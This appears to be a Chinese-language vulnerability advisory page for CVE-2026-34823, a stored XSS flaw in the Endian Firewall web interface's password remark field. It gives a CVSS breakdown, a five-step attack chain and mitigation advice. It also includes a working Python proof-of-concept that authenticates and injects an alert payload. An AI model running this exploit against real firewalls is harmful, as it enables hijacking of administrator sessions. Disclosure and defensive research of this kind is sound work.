CVE-2026-34823 CVSS 6.4 中危

CVE-2026-34823 Endian Firewall存储型XSS漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34823

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Endian Firewall

漏洞概述

Endian Firewall 3.3.25及之前版本在Web管理界面中存在存储型跨站脚本（XSS）漏洞。攻击者可通过/manage/password/web/接口中的remark参数注入恶意JavaScript代码。由于漏洞无需用户交互且只需低权限认证，经授权的攻击者可利用此漏洞将恶意脚本持久化存储在服务器端。当其他管理员或用户访问受影响页面时，恶意脚本将被执行，进而可能导致账户劫持或敏感信息泄露。

技术细节

该漏洞源于Endian Firewall未对`/manage/password/web/`接口的`remark`参数进行充分的输入验证和过滤。攻击者首先需要以低权限用户身份登录系统。随后，构造包含恶意JavaScript代码的POST请求发送至目标端点。由于应用直接将用户输入存储并在后续页面渲染时未进行HTML实体编码，导致代码被持久化。当具有更高权限的用户（如管理员）访问包含该备注的页面时，嵌入的脚本将在其浏览器环境中运行。CVSS向量中的S:C表明此漏洞可能改变安全上下文，允许攻击者利用受害者的会话权限执行未授权操作。

攻击链分析

STEP 1

认证

攻击者使用有效的低权限账户登录Endian Firewall Web管理界面。

STEP 2

注入

攻击者向/manage/password/web/发送请求，在remark参数中插入恶意的JavaScript代码。

STEP 3

存储

服务器接收请求，未经过滤将恶意代码存储在数据库或配置文件中。

STEP 4

触发

当管理员或其他用户访问包含该remark数据的页面时，服务器从后端读取并渲染内容。

STEP 5

执行

受害者的浏览器解析渲染后的HTML，执行其中的恶意脚本，攻击者借此窃取Cookie或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip, username, password):
    """
    PoC for CVE-2026-34823 Stored XSS in Endian Firewall
    """
    login_url = f"https://{target_ip}/login"
    target_url = f"https://{target_ip}/manage/password/web/"
    
    session = requests.Session()
    # Step 1: Authenticate (Low privilege)
    creds = {"username": username, "password": password}
    session.post(login_url, data=creds, verify=False)
    
    # Step 2: Inject Payload via remark parameter
    # Payload: Simple JavaScript alert to verify execution
    payload = "<img src=x onerror=alert('CVE-2026-34823')>"
    
    data = {
        "remark": payload,
        "other_params": "..."
    }
    
    response = session.post(target_url, data=data, verify=False)
    
    if response.status_code == 200:
        print(f"[+] Payload injected successfully at {target_url}")
        print("[*] Wait for an admin to view the page to trigger XSS.")
    else:
        print("[-] Failed to inject payload.")

if __name__ == "__main__":
    exploit("192.168.1.1", "user", "user123")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施

在未升级补丁前，建议限制Web管理界面的网络访问，仅通过VPN或受信任的内网IP进行管理。同时，管理员应谨慎审核系统中的用户权限，并加强对异常HTTP请求的监控。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表